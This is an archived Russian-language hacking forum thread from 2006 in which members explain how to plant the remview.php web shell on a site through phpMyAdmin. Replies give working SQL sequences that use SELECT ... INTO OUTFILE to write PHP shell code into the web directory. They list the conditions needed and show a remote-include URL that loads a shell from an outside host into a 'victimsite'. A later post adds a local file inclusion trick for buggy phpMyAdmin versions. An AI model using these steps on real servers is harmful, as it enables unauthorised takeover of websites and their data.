Залить remview.php через phpMyAdmin

Discussion in 'PHP' started by Grom, 3 Feb 2006.

  1. Grom

    Grom New Member

    Joined:
    3 Sep 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Есть доступ к phpmyadmin, как залить remview.php на сайт?
    Заранее благодарен!
     
  2. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    select запись с шелом into outfile 'path_to_file/file.php'
     
    _________________________
  3. Grom

    Grom New Member

    Joined:
    3 Sep 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А можно поконкретней, пожалуйста?
     
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    INSERT INTO table VALUES(7777777, 0, "<? system($e); ?>", 0)
    SELECT * FROM table WHERE (param1 = 7777777) INTO OUTFILE /home/site/www/shell.php
    Если не прав поправте.
     
  5. Grom

    Grom New Member

    Joined:
    3 Sep 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Ругается на ошибку "1064: you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table VALUES(7777777, 0, "<? system($e); ?>", 0)
    SELECT * FROM"
     
  6. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Подумай сам.... что это может быть.. запрос тебе дали...Или ты хочешь чтобы дебе Полные права дали на Этой тачке? Гы... Иногда надо думать головой...
     
  7. Trinux

    Trinux Members of Antichat

    Joined:
    26 Nov 2004
    Messages:
    1,403
    Likes Received:
    296
    Reputations:
    364
    Вообще phpMyAdmin тут не причем, есть он или нет его - не имеет значения. Ну... практически =) Дело в MySQL. Но чтобы залить файл, тот же шелл, на хостинг тебе потребуется следующее:

    1) Включенные MySQL файловые функции (а их почти все вырубают для безопасности)
    2) Знать полный адрес от корня файловой системы до web контента
    3) Иметь в вебе диру с 0770 или 0777 чмодом
    4) Выучить скуль =)

    2 SanyaX
    значение INTO OUTFILE ковычками обособляется =)
     
    _________________________
  8. Ekib

    Ekib New Member

    Joined:
    4 Feb 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Вот так надо:
    CREATE TABLE `shell` (`script` TEXT NOT NULL) COMMENT = 'table for include';
    INSERT INTO `shell` ( `script` ) VALUES ('<? phpcode(); ?>');
    SELECT script FROM `shell` INTO OUTFILE '/home/localhost/www/shell.php';
    DROP TABLE `shell`;
    Вместо <? phpcode(); ?> пишешь код шелла или <? include($_GET[‘shell’]); ?> а потом переходишь на http://victimsite.com/shell.php?shell=http://our_site.narod.ru/remview.php
    Никаких кавычек в INTO OUTFILE не надо. Только права должны быть рутовые...
     
    #8 Ekib, 4 Feb 2006
    Last edited: 4 Feb 2006
  9. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    если нет возможности в веб дирриктории создать файлик то можно поробовать в тмп и если phpmyadmin бажная(кажись это 2.6.*, или ещё какие, точно не помню) то проинклудить локально с её помощью, вотъ

    P.S.
    а файлик так создаем :
    select '<? phpinfo(); ?>' from test into outfile '/tmp/ddd'
     
    #9 ShAnKaR, 4 Feb 2006
    Last edited: 4 Feb 2006